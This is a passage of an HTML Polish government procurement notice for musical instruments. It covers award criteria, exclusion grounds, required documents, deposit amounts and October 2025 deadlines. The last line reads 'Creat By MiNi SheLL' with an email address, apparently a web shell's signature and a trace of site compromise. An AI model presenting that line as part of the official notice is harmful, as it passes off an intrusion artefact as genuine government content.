dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: <br/>1)	nie podlegają wykluczeniu. <br/>2.	Spełniają warunki udziału w postępowaniu dotyczące: <br/>1)	Zdolności do występowania w obrocie gospodarczym. <br/>Zamawiający nie wskazuje warunku.<br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej <br/>lub zawodowej, o ile wynika to z odrębnych przepisów. <br/>Zamawiający nie wskazuje warunku.<br/>3)	Sytuacji ekonomicznej lub finansowej. <br/>4)	Zdolności technicznej lub zawodowej.<br/>Warunek zdolności technicznej i zawodowej uznaje się za spełniony <br/>w przypadku oferty na Część I i Część II postępowania, jeżeli Wykonawca wykaże, <br/>że w okresie ostatniego roku przed upływem terminu składania ofert <br/>(a w przypadku krótszego okresu prowadzenia działalności – w tym okresie) wykonał należycie co najmniej jedno zamówienie na dostawę instrumentów opisanych w postępowaniu na kwotę min 20 000 PLN z VAT każde. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu oraz wykazania braku podstaw do wykluczenia, Zamawiający żąda od Wykonawcy, którego oferta została najwyżej oceniona, złożenia – na wezwanie Zamawiającego, w terminie nie krótszym niż 10 dni – następujących dokumentów:<br/>1)	Informacji z Krajowego Rejestru Karnego, sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem, w zakresie:<br/>a)	art. 108 ust. 1 pkt 1 i 2 ustawy Pzp,<br/>b)	art. 108 ust. 1 pkt 4 ustawy Pzp.<br/>2)	Oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia wskazanych przez Zamawiającego, tj.:<br/>a)	art. 108 ust. 1 pkt 3–6 ustawy Pzp,<br/>b)	art. 109 ust. 1 pkt 8–10 ustawy Pzp,<br/>c)	przepisów tzw. ustawy sankcyjnej oraz rozporządzenia Rady (UE) 2022/576.<br/>Wzór oświadczenia stanowi Załącznik nr 2 do SWZ.<br/>3)	Oświadczenia o przynależności lub braku przynależności do grupy kapitałowej, o której mowa w art. 108 ust. 1 pkt 5 Pzp, składane w terminie 3 dni od zamieszczenia przez Zamawiającego informacji z otwarcia ofert.<br/>Wzór oświadczenia stanowi Załącznik nr 4 do SWZ.<br/>4)	Odpis lub informacja z Krajowego Rejestru Sądowego albo z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, potwierdzająca, że wobec Wykonawcy nie otwarto likwidacji ani nie ogłoszono upadłości.<br/>5)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1 i 4, składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:<br/>a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,<br/>b)	nie został skazany za przestępstwa określone w art. 108 ust. 1 pkt 1–2 i 4 Pzp.<br/>Dokumenty te muszą być wystawione nie wcześniej niż 6 miesięcy przed ich złożeniem.<br/>6)	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, lub nie odnoszą się one do wszystkich przypadków, oświadczenia zastępuje się odpowiednim oświadczeniem wykonawcy lub osoby uprawnionej, złożonym pod przysięgą lub przed właściwym organem, notariuszem albo urzędnikiem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu oraz wykazania braku podstaw do wykluczenia, Zamawiający żąda od Wykonawcy, którego oferta została najwyżej oceniona, złożenia – na wezwanie Zamawiającego, w terminie nie krótszym niż 10 dni – następujących dokumentów:<br/>1)	Informacji z Krajowego Rejestru Karnego, sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem, w zakresie:<br/>a)	art. 108 ust. 1 pkt 1 i 2 ustawy Pzp,<br/>b)	art. 108 ust. 1 pkt 4 ustawy Pzp.<br/>2)	Oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia wskazanych przez Zamawiającego, tj.:<br/>a)	art. 108 ust. 1 pkt 3–6 ustawy Pzp,<br/>b)	art. 109 ust. 1 pkt 8–10 ustawy Pzp,<br/>c)	przepisów tzw. ustawy sankcyjnej oraz rozporządzenia Rady (UE) 2022/576.<br/>Wzór oświadczenia stanowi Załącznik nr 2 do SWZ.<br/>3)	Oświadczenia o przynależności lub braku przynależności do grupy kapitałowej, o której mowa w art. 108 ust. 1 pkt 5 Pzp, składane w terminie 3 dni od zamieszczenia przez Zamawiającego informacji z otwarcia ofert.<br/>Wzór oświadczenia stanowi Załącznik nr 4 do SWZ.<br/>4)	Odpis lub informacja z Krajowego Rejestru Sądowego albo z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, potwierdzająca, że wobec Wykonawcy nie otwarto likwidacji ani nie ogłoszono upadłości.<br/>5)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1 i 4, składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:<br/>a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,<br/>b)	nie został skazany za przestępstwa określone w art. 108 ust. 1 pkt 1–2 i 4 Pzp.<br/>Dokumenty te muszą być wystawione nie wcześniej niż 6 miesięcy przed ich złożeniem.<br/>6)	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, lub nie odnoszą się one do wszystkich przypadków, oświadczenia zastępuje się odpowiednim oświadczeniem wykonawcy lub osoby uprawnionej, złożonym pod przysięgą lub przed właściwym organem, notariuszem albo urzędnikiem.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Warunek zdolności technicznej i zawodowej uznaje się za spełniony <br/>w przypadku oferty na Część I i Część II postępowania, jeżeli Wykonawca wykaże, <br/>że w okresie ostatniego roku przed upływem terminu składania ofert <br/>(a w przypadku krótszego okresu prowadzenia działalności – w tym okresie) wykonał należycie co najmniej jedno zamówienie na dostawę instrumentów opisanych w postępowaniu na kwotę min 20 000 PLN z VAT każde. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wadium w wysokości:<br/>1)	Część I – 718 zł,<br/>2)	Część II – 585 zł,<br/>2.	Okres ważności wadium powinien być zgodny z terminem związania ofertą. <br/>3.	Za datę wniesienia wadium uznaje się datę uznania rachunku Zamawiającego kwotą wadium.<br/>4.	Wadium wnosi się przed upływem terminu składania ofert, zgodnie z art. 97 ust. 7 PZP.<br/>5.	Wadium może być wniesione w następujących formach:<br/>1)	pieniądzu - na konto: NBP Odział okręgowy Szczecin nr 02 1010 1599 0166 2313 9120 0000 z adnotacją: Wadium: „Sprzedaż i dostawa nowych instrumentów muzycznych wraz z wyposażeniem towarzyszącym, w podziale na części.”<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U z 2019 r. poz.310, 836 i 1572).<br/>6.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.	Wspólne ubieganie się wykonawców o udzielenie zamówienia. <br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2)	W przypadku, wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy <br/>w sprawie zamówienia publicznego. <br/>3)	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa <br/>w art. 112 ust. 2 pkt 2 PZP, zostanie spełniony, jeżeli co najmniej jeden <br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej <br/>lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. <br/>4)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający <br/>się o udzielenie zamówienia mogą polegać na zdolnościach tych <br/>z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>5)	W przypadku, o którym mowa w Rozdziale V. SWZ, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, <br/>z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <br/>6)	W niniejszym postępowaniu Zamawiający nie określa szczególnego, obiektywnie uzasadnionego, sposobu spełniania przez wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków udziału <br/>w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-21 07:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-21 08:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com